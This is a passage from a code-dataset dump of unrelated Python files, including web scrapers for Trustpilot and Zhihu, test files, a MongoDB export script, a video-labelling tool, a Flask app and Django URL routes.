id_match = tweet_id_re.search(line)\n if not id_match:\n print(\"No tweet id found in file %s's line %s!\" % (path, line))\n continue\n \n timestamp_match = timestamp_re.search(line)\n if not timestamp_match:\n\n created_at_match = created_at_re.search(line)\n if not created_at_match:\n print(\"No time found in file %s's line %s!\" % (path, line))\n continue\n\n # convert to unix time with milliseconds\n tweet_timestamp = int(time.mktime(datetime.strptime(created_at_match.group(1), '%a %b %d %X +0000 %Y').timetuple()) * 1000)\n else:\n tweet_timestamp = int(timestamp_match.group(1))\n\n\n tweet_id = int(id_match.group(1))\n tweet_text = text_match.group(1).replace('\\\\n', ' ').replace('\\\\r', ' ').decode('unicode-escape')\n\n\n parent_match = parent_id_re.search(line)\n\n if parent_match:\n parent_id = int(parent_match.group(1))\n\n while True:\n # if the parent doesn't exists make a new chain\n if parent_id not in tweet_parent:\n tweet_parent[tweet_id] = 0\n parent_id = tweet_id\n break\n\n if tweet_parent[parent_id] == 0:\n break\n\n parent_id = tweet_parent[parent_id]\n\n else:\n tweet_parent[tweet_id] = 0\n parent_id = tweet_id\n\n f_out.write(str(tweet_timestamp))\n f_out.write(' ')\n f_out.write(str(parent_id))\n f_out.write(' ')\n f_out.write(tweet_text.encode('utf-8'))\n f_out.write('\\n')\n", "sub_path": "collect_reply_chains.py", "file_name": "collect_reply_chains.py", "file_ext": "py", "file_size_in_byte": 3362, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 7, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 8, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 10, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 11, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 24, "usage_type": "name"}, {"api_name": "time.mktime", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "31202637", "text": "from astropy.utils.data import get_pkg_data_filename\nfrom contextlib import redirect_stdout\nfrom io import StringIO\nimport pytest\nfrom skypy import __version__ as skypy_version\nfrom skypy.pipeline.scripts import skypy\n\n\ndef test_skypy():\n\n # No arguments\n with pytest.raises(SystemExit) as e:\n skypy.main([])\n assert e.value.code == 0\n\n # Argparse help\n with pytest.raises(SystemExit) as e:\n skypy.main(['--help'])\n assert e.value.code == 0\n\n # Argparse version\n version = StringIO()\n with pytest.raises(SystemExit) as e:\n with redirect_stdout(version):\n skypy.main(['--version'])\n assert version.getvalue().strip() == skypy_version\n assert e.value.code == 0\n\n # Missing positional argument 'config'\n with pytest.raises(SystemExit) as e:\n skypy.main(['--format', 'fits'])\n assert e.value.code == 2\n\n # Invalid file format\n with pytest.raises(SystemExit) as e:\n skypy.main(['--format', 'invalid', 'config.filename'])\n assert e.value.code == 2\n\n # Process empty config file\n filename = get_pkg_data_filename('data/empty_config.yml')\n assert skypy.main([filename]) == 0\n\n # Process test config file\n filename = 
get_pkg_data_filename('data/test_config.yml')\n    assert skypy.main([filename]) == 0\n\n    # Process lightcone config file\n    filename = get_pkg_data_filename('data/lightcone_config.yml')\n    assert skypy.main([filename]) == 0\n", "sub_path": "skypy/pipeline/tests/test_skypy.py", "file_name": "test_skypy.py", "file_ext": "py", "file_size_in_byte": 1447, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.raises", "line_number": 12, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 13, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 13, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 17, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 18, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 18, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 23, "usage_type": "call"}, {"api_name": "contextlib.redirect_stdout", "line_number": 24, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 25, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 25, "usage_type": "name"}, {"api_name": "skypy.__version__", "line_number": 26, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 30, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 31, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 31, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 35, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 36, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 36, "usage_type": "name"}, {"api_name": "astropy.utils.data.get_pkg_data_filename", "line_number": 40, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 41, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 41, "usage_type": "name"}, {"api_name": "astropy.utils.data.get_pkg_data_filename", "line_number": 44, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 45, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 45, "usage_type": "name"}, {"api_name": "astropy.utils.data.get_pkg_data_filename", "line_number": 48, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy.main", "line_number": 49, "usage_type": "call"}, {"api_name": "skypy.pipeline.scripts.skypy", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "292794770", "text": "#coding:utf-8\r\n\"\"\"\r\nExport the keywords from every table in one database into a txt file so that the crawler can crawl them.\r\n\"\"\"\r\nimport pymongo\r\n\r\nclass dbToTxt(object):\r\n    def __init__(self, db_name='monstercralwer'):\r\n        conn = pymongo.MongoClient('127.0.0.1', 27017)\r\n        self.db = conn[db_name]\r\n\r\n    def key_to_txt(self):\r\n\r\n        collection_names = self.db.collection_names()\r\n        for name in collection_names:\r\n            if 'keys' in name.split('_'):\r\n                cursor = self.db[name].find()\r\n                for content in cursor:\r\n                    with open('seen_keywords.txt', 'a+') as f:\r\n                        f.write(content['keyword'] + '\\n')\r\n\r\ndbtotxt = dbToTxt()\r\ndbtotxt.key_to_txt()\r\n\r\n\r\n\r\n\r\n", "sub_path": "spider_avira/db_to_txt.py", "file_name": "db_to_txt.py", "file_ext": "py", "file_size_in_byte": 731, 
"program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymongo.MongoClient", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "442200015", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport argparse\nimport pymysql.cursors\nimport json\nfrom config import conf\n\n\ndef check_status():\n \"\"\"Checks status of webpage\"\"\"\n r = requests.get('https://www.trustpilot.com')\n print(r.status_code)\n print(r.status_code == requests.codes.ok)\n print(requests.codes['temporary_redirect'])\n print(requests.codes.teapot)\n print(requests.codes['o/'])\n\n\ndef scrap(company, num_pages):\n \"\"\"Scrap a company's reviews from their TrustPilot page.\"\"\"\n names = []\n ratings = []\n titles = []\n contents = []\n rev_wrote = []\n replies = []\n company_names = []\n num_reviews = []\n company_ratings = []\n website = []\n urls = []\n symbols = []\n\n headers = requests.utils.default_headers()\n headers.update({\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',\n })\n\n for p in range(1, int(num_pages)):\n page_url = requests.get('https://www.trustpilot.com/review/' + company + '?page=' + str(p), headers=headers)\n soup = BeautifulSoup(page_url.content, 'html.parser')\n review_card = soup.find_all('div', class_='review-card')\n # find website of the company\n # I do it just one time\n # TODO LOOK AT THIS we need to put\n if p == 1:\n web_tag = soup.find_all('a', class_=\"badge-card__section badge-card__section--hoverable company_website\")\n for a in web_tag:\n website.append(a['href'])\n company_name = soup.find('span', class_='multi-size-header__big').get_text(strip=True)\n company_names.append(company_name)\n num_review = soup.find('h2', class_='header--inline').get_text(strip=True)\n num_review = ''.join(filter(str.isdigit, num_review))\n num_reviews.append(num_review)\n company_rating = soup.find('p', class_='header_trustscore').get_text()\n company_ratings.append(company_rating)\n symbol = yahoo_finance(company_name)\n symbols.append(symbol)\n # get url for each user\n user_url = soup.find_all('a', href=True)\n for a in user_url:\n user_id = a['href']\n if '/users/5' in user_id and user_id not in urls:\n urls.append(user_id)\n for review in review_card:\n # Username\n name = review.find('div', class_='consumer-information__name').get_text(strip=True)\n names.append(name)\n # Rating\n rating = review.find('img').attrs.get('alt')\n ratings.append(rating)\n # Review title\n title = review.find('a', class_='link link--large link--dark').get_text(strip=True)\n titles.append(title)\n # Review content\n if review.find('p', class_='review-content__text'):\n content = review.find('p', class_='review-content__text').get_text(strip=True)\n else:\n content = None\n contents.append(content)\n # Number of reviews wrote by user\n rev_written = review.span.get_text()\n rev_wrote.append(rev_written)\n # Replied received\n reply = review.find('div', class_='review__company-reply')\n if reply:\n replies.append(1)\n else:\n replies.append(0)\n # country and parse another page\n countries = parse_another_page(urls)\n reviews_dict = {'ratings': ratings,\n 'titles': titles,\n 'contents': contents,\n 'replies': replies\n }\n users_dict = {'names': names,\n 'countries': countries,\n 'rev_wrote': rev_wrote\n }\n companies_dict = {'company_names': company_names,\n 'company_ratings': company_ratings,\n 'website': website,\n 'num_reviews': num_reviews,\n 'symbols': 
symbols\n                      }\n    return reviews_dict, users_dict, companies_dict\n\n\ndef parse_another_page(urls):\n    lst = []\n    for url in urls:\n        page_url = requests.get('https://www.trustpilot.com/' + url)\n        soup = BeautifulSoup(page_url.content, 'html.parser')\n        countries = soup.find('div', class_='user-summary-location')\n        if countries is not None:\n            lst.append(countries.text.strip().strip('\\n'))\n    return lst\n\n\ndef export_csv(company, num_pages):\n    \"\"\"Stores results in pandas dataframes and creates csv files.\"\"\"\n    reviews_dict, users_dict, companies_dict = scrap(company, num_pages)\n    reviews_df = pd.DataFrame(reviews_dict)\n    users_df = pd.DataFrame(users_dict)\n    companies_df = pd.DataFrame(companies_dict)\n    reviews_df.to_csv('reviews.csv')\n    users_df.to_csv('users.csv')\n    companies_df.to_csv('companies.csv')\n\n\ndef export_sql(company, num_pages):\n    \"\"\"Stores the scraped results in a MySQL database, creating the schema if needed.\"\"\"\n    reviews_dict, users_dict, companies_dict = scrap(company, num_pages)\n    try:\n        connection = pymysql.connect(host='localhost',\n                                     user=conf.user,\n                                     password=conf.password,\n                                     database='trustpilot',\n                                     charset='utf8mb4',\n                                     cursorclass=pymysql.cursors.DictCursor)\n        print('Database exists. Successfully connected')\n        c = connection.cursor()\n    except pymysql.Error:\n        # the database does not exist yet; connect without it and create it\n        connection = pymysql.connect(host='localhost',\n                                     user=conf.user,\n                                     password=conf.password,\n                                     charset='utf8mb4',\n                                     cursorclass=pymysql.cursors.DictCursor)\n        c = connection.cursor()\n        c.execute('CREATE DATABASE trustpilot')\n        c.execute('USE trustpilot')\n        users_table = \"\"\" CREATE TABLE Users (\n        user_id int NOT NULL UNIQUE AUTO_INCREMENT,\n        user_name varchar(255),\n        country varchar(255),\n        rev_wrote int,\n        PRIMARY KEY (user_id));\n        \"\"\"\n        companies_table = \"\"\"\n        CREATE TABLE Companies (\n        company_id int NOT NULL UNIQUE AUTO_INCREMENT,\n        company_names varchar(255),\n        company_ratings varchar(255),\n        website varchar(255),\n        num_reviews int,\n        symbols varchar(255),\n        PRIMARY KEY (company_id)\n        );\n        \"\"\"\n        reviews_table = \"\"\"\n        CREATE TABLE Reviews (\n        review_id int NOT NULL UNIQUE AUTO_INCREMENT,\n        rating int,\n        title varchar(255),\n        content varchar(255),\n        replies int,\n        user_id int,\n        company_id int,\n        PRIMARY KEY (review_id),\n        FOREIGN KEY (user_id) REFERENCES Users (user_id),\n        FOREIGN KEY (company_id) REFERENCES Companies (company_id)\n        );\n        \"\"\"\n        # with connection.cursor() as cursor:\n        c.execute(users_table)\n        c.execute(companies_table)\n        c.execute(reviews_table)\n    c.execute(\"SET GLOBAL sql_mode='';\")\n    companies_insert_query = 'INSERT INTO Companies(company_names,company_ratings,website,num_reviews) VALUES (%s,%s,%s,%s) '\n    c.execute(companies_insert_query, (companies_dict['company_names'][0], companies_dict['company_ratings'][0],\n                                       companies_dict['website'][0], companies_dict['num_reviews'][0]))\n    company_id = c.lastrowid\n    for i in range(len(reviews_dict['ratings'])):\n        # print(reviews_dict['ratings'][i])\n        users_insert_query = 'INSERT INTO Users(user_name,country,rev_wrote) VALUES (%s,%s,%s)'\n        c.execute(users_insert_query,\n                  (users_dict['names'][i], users_dict['countries'][i], users_dict['rev_wrote'][i]))\n        # get user id foreign key\n        user_id = c.lastrowid\n        reviews_insert_query = 'INSERT INTO Reviews(rating,title,content,replies, user_id, company_id) VALUES (%s,%s,%s,%s,%s,%s)'\n        c.execute(reviews_insert_query,\n                  (reviews_dict['ratings'][i], reviews_dict['titles'][i], reviews_dict['contents'][i],\n                   reviews_dict['replies'][i], user_id, company_id))\n    # c.commit()\n    # insert foreign key company\n    c.close()\n    
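# commit once so every insert above is persisted in a single transaction\n    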
connection.commit()\n\n\ndef yahoo_finance(company_name):\n \"\"\"Gets the company's stock symbol if it is publicly traded\"\"\"\n url = \"https://apidojo-yahoo-finance-v1.p.rapidapi.com/auto-complete\"\n querystring = {\"q\": company_name, \"region\": \"US\"}\n headers = {\n 'x-rapidapi-key': conf.api_key,\n 'x-rapidapi-host': \"apidojo-yahoo-finance-v1.p.rapidapi.com\"\n }\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n resp_str = response.text\n resp_dict = json.loads(resp_str)\n try:\n quote = resp_dict['quotes'][0]\n symbol = quote['symbol']\n except IndexError:\n symbol = ''\n return symbol\n\n\ndef main():\n \"\"\"Runs commands above\"\"\"\n # CLI\n parser = argparse.ArgumentParser()\n parser.add_argument('company', help='company_name')\n parser.add_argument('num_pages', help='page limit')\n args = parser.parse_args()\n company = args.company\n num_pages = args.num_pages\n print('Scrapping data from ' + company)\n # export_csv(company, num_pages)\n export_sql(company, num_pages)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "scrapper.py", "file_name": "scrapper.py", "file_ext": "py", "file_size_in_byte": 9989, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 14, "usage_type": "attribute"}, {"api_name": "requests.codes", "line_number": 15, "usage_type": "attribute"}, {"api_name": "requests.codes", "line_number": 16, "usage_type": "attribute"}, {"api_name": "requests.codes", "line_number": 17, "usage_type": "attribute"}, {"api_name": "requests.utils.default_headers", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 35, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 114, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 127, "usage_type": "call"}, {"api_name": "pymysql.cursors.connect", "line_number": 137, "usage_type": "call"}, {"api_name": "pymysql.cursors", "line_number": 137, "usage_type": "name"}, {"api_name": "config.conf.user", "line_number": 138, "usage_type": "attribute"}, {"api_name": "config.conf", "line_number": 138, "usage_type": "name"}, {"api_name": "config.conf.password", "line_number": 139, "usage_type": "attribute"}, {"api_name": "config.conf", "line_number": 139, "usage_type": "name"}, {"api_name": "pymysql.cursors.cursors", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pymysql.cursors", "line_number": 142, "usage_type": "name"}, {"api_name": "pymysql.cursors.connect", "line_number": 146, "usage_type": "call"}, {"api_name": "pymysql.cursors", "line_number": 146, "usage_type": "name"}, {"api_name": "config.conf.user", "line_number": 147, "usage_type": "attribute"}, {"api_name": "config.conf", "line_number": 147, "usage_type": "name"}, {"api_name": "config.conf.password", "line_number": 148, "usage_type": "attribute"}, {"api_name": "config.conf", "line_number": 148, "usage_type": "name"}, {"api_name": "pymysql.cursors.cursors", "line_number": 150, "usage_type": "attribute"}, 
{"api_name": "pymysql.cursors", "line_number": 150, "usage_type": "name"}, {"api_name": "config.conf.api_key", "line_number": 217, "usage_type": "attribute"}, {"api_name": "config.conf", "line_number": 217, "usage_type": "name"}, {"api_name": "requests.request", "line_number": 220, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 222, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 234, "usage_type": "call"}]} +{"seq_id": "127805288", "text": "import json\n\nfrom appvalidator import validate_app, validate_packaged_app\nfrom helper import safe\n\n\n@safe\ndef test_webapp_new():\n \"\"\"Test that webapps can be validated with the new api.\"\"\"\n with open(\"tests/resources/testwebapp.webapp\") as file_:\n out = validate_app(file_.read())\n j = json.loads(out)\n assert j[\"success\"], \"Expected not to fail\"\n\n\n@safe\ndef test_packaged_app_new():\n \"\"\"Test that packaged apps can be validated with the new api.\"\"\"\n out = validate_packaged_app(\"tests/resources/packaged_app.zip\",\n listed=False)\n j = json.loads(out)\n assert j[\"success\"], \"Expected not to fail\"\n\n\n@safe\ndef test_packaged_app_bundle():\n \"\"\"Test that packaged apps can be validated with the new api.\"\"\"\n out = validate_packaged_app(\"tests/resources/packaged_app.zip\",\n listed=False, format=None)\n assert out.get_resource(\"packaged\")\n", "sub_path": "tests/test_validate.py", "file_name": "test_validate.py", "file_ext": "py", "file_size_in_byte": 934, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "appvalidator.validate_app", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 12, "usage_type": "call"}, {"api_name": "helper.safe", "line_number": 7, "usage_type": "name"}, {"api_name": "appvalidator.validate_packaged_app", "line_number": 19, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 21, "usage_type": "call"}, {"api_name": "helper.safe", "line_number": 16, "usage_type": "name"}, {"api_name": "appvalidator.validate_packaged_app", "line_number": 28, "usage_type": "call"}, {"api_name": "helper.safe", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "20888779", "text": "from requests import Session\nimport re\nimport random\nimport urllib.parse\n\nclass SpiderLogin(object):\n # 构造-------------------\n def __init__(self):\n # 会话\n self.session = None\n\n self.mainURL = 'https://www.zhihu.com'\n self.login_url = self.mainURL + '/login/email'\n self.login_data = {\n 'email': '1756563255@qq.com',\n 'password': '***',\n 'rememberme': 'true'\n }\n\n self.headers_base = {\n 'X-Requested-With': 'XMLHttpRequest',\n 'Referer': 'http://www.zhihu.com',\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; '\n 'rv:39.0) Gecko/20100101 Firefox/39.0',\n 'Host': 'www.zhihu.com'\n }\n\n def get_xsrf(self, url=None):\n page = self.session.get(url, verify=False)\n # print (page.text)\n xsrf = re.search('.*?', page.text)\n # print xsrf.group(1)\n if xsrf == None:\n return ''\n else:\n return xsrf.group(1)\n\n def login(self):\n self.session = Session()\n\n # 获取 xsrf\n xsrf = self.get_xsrf('https://www.zhihu.com/#signin')\n self.login_data['_xsrf'] = xsrf.encode('utf-8')\n\n # 获取验证码\n captcha_url = 'https://www.zhihu.com/captcha.gif'\n params = {'r': random.random(), 'type': 'login'}\n r = self.session.get(captcha_url + '?' 
\n        # fetch the captcha image\n        captcha_url = 'https://www.zhihu.com/captcha.gif'\n        params = {'r': random.random(), 'type': 'login'}\n        r = self.session.get(captcha_url + '?' + urllib.parse.urlencode(params), verify=True)\n        # head = r.request.headers\n        # print head\n        open('captcha.gif', 'wb').write(r.content)\n        print(u'Please enter the captcha')\n        captcha_str = input()\n        self.login_data['captcha'] = captcha_str\n\n        # post the login form\n        response = self.session.post(self.login_url, headers=self.headers_base, data=self.login_data, verify=True)\n        print(\"--------------response-----------\\n\", response)\n        print(\"status code: \", response.status_code)\n        print(response.cookies)\n        # print(response.text)  # personal profile page after logging in\n        print(\"----------------------------------\")\n\n        return self.session\n\nif __name__ == \"__main__\":\n    SpiderLogin().login()\n", "sub_path": "spider_login.py", "file_name": "spider_login.py", "file_ext": "py", "file_size_in_byte": 2198, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.search", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 39, "usage_type": "call"}, {"api_name": "random.random", "line_number": 47, "usage_type": "call"}, {"api_name": "urllib.parse.parse.urlencode", "line_number": 48, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 48, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "408596876", "text": "import os\nimport cv2\nimport copy\nimport sys\nimport time\nfrom ctypes import windll, Structure, c_long, byref\nimport json\n\ndef convert_frame_to_time(frame):\n    return frame / 30.0\n\n\nclass POINT(Structure):\n    _fields_ = [(\"x\", c_long), (\"y\", c_long)]\n\n\ndef queryMousePosition():\n    pt = POINT()\n    windll.user32.GetCursorPos(byref(pt))\n    return 1 - pt.y/1151\n\n\ndef main(match_to_process, score_output_path):\n    score = []\n    cap = cv2.VideoCapture(match_to_process)\n    current_frame = 0\n    while cap.isOpened():\n        current_frame += 1\n        ret, frame = cap.read()\n        if ret is True:\n            time_frame = convert_frame_to_time(current_frame - 10)\n            cv2.imshow('view', frame)\n            key = cv2.waitKey(0)\n            if key & 0xFF == ord('w'):\n                pos = queryMousePosition()\n                if current_frame < 10:\n                    continue\n                score.append([time_frame, pos])\n                print(pos)\n                time.sleep(0.03)\n                continue\n        if ret is False:\n            cap.release()\n            with open(score_output_path, 'w') as output:\n                json.dump(score, output)\n\nif __name__ == \"__main__\":\n    main('C:\\\\Users\\\\patin_000\\\\source\\\\repos\\\\DSP\\\\Broadcasts\\\\325392389\\\\match7.mp4', 'C:\\\\Users\\\\patin_000\\\\source\\\\repos\\\\DSP\\\\TensorflowData\\\\Unprocessed\\\\325392389_match7.txt')\n    #main(sys.argv[1], sys.argv[2])\n", "sub_path": "Scripts/TrainingDataGenerator.py", "file_name": "TrainingDataGenerator.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "ctypes.Structure", "line_number": 13, "usage_type": "name"}, {"api_name": "ctypes.c_long", "line_number": 14, "usage_type": "name"}, {"api_name": "ctypes.windll.user32.GetCursorPos", "line_number": 19, "usage_type": "call"}, {"api_name": "ctypes.windll.user32", "line_number": 19, "usage_type": "attribute"}, {"api_name": "ctypes.windll", "line_number": 19, "usage_type": "name"}, {"api_name": "ctypes.byref", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 33, "usage_type": "call"}, {"api_name": 
"time.sleep", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "61096039", "text": "from flask import Flask, render_template, request\nfrom repo_find import get\n\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/list\", methods=[\"GET\"])\ndef get_my_list():\n org = request.args.get(\"org\")\n n = request.args.get(\"N\")\n m = request.args.get(\"M\")\n page_no = request.args.get(\"page_no\", \"1\")\n\n if(int(n) <= 0 or int(m) < 0):\n return \"There is an error with organization or one of the values of n or m is not positive\"\n\n repos, next_page_link, previous_page_link = get(org, int(n), int(m), page_no)\n org_name = str(org)\n\n if repos == \"404\":\n return \"There is an error with organization or one of the values of n or m is not positive\"\n return render_template(\n \"repo_list.html\",\n repos=repos,\n org=org_name.upper(),\n next_page_link=next_page_link,\n previous_page_link=previous_page_link,\n )\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1004, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "repo_find.get", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "443901282", "text": "from django.urls import path\nfrom information import views\n\nurlpatterns = [\n path('newsinfo/', views.NewsList.as_view()),\n path('newsinfoList/', views.newsinfoList),\n\n\n path('dustinfo/', views.DustList.as_view()),\n path('dustinfoList/', views.dustinfoList),\n path('dustliveinfo/', views.dustliveinfo),\n\n\n path('WeatherNotice/', views.WeatherNotice.as_view()),\n path('WeathernoticeList/', views.WeathernoticeList),\n\n\n path('weatherinfo/', views.WeatherList.as_view()),\n path('weatherinfoList/', views.weatherinfoList),\n path('weatherliveinfo/', views.weatherliveinfo),\n \n path('rainraderinfo/', views.rainraderinfo),\n path('sickinfo/', views.SickList),\n path('buginfo/', views.BugList),\n]\n\n", "sub_path": "projectback/information/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 731, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": 
"13", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "information.views.NewsList.as_view", "line_number": 5, "usage_type": "call"}, {"api_name": "information.views.NewsList", "line_number": 5, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "information.views.newsinfoList", "line_number": 6, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "information.views.DustList.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "information.views.DustList", "line_number": 9, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "information.views.dustinfoList", "line_number": 10, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "information.views.dustliveinfo", "line_number": 11, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "information.views.WeatherNotice.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "information.views.WeatherNotice", "line_number": 14, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "information.views.WeathernoticeList", "line_number": 15, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "information.views.WeatherList.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "information.views.WeatherList", "line_number": 18, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "information.views.weatherinfoList", "line_number": 19, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 19, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "information.views.weatherliveinfo", "line_number": 20, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "information.views.rainraderinfo", "line_number": 22, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "information.views.SickList", "line_number": 23, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "information.views.BugList", "line_number": 24, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 24, "usage_type": 
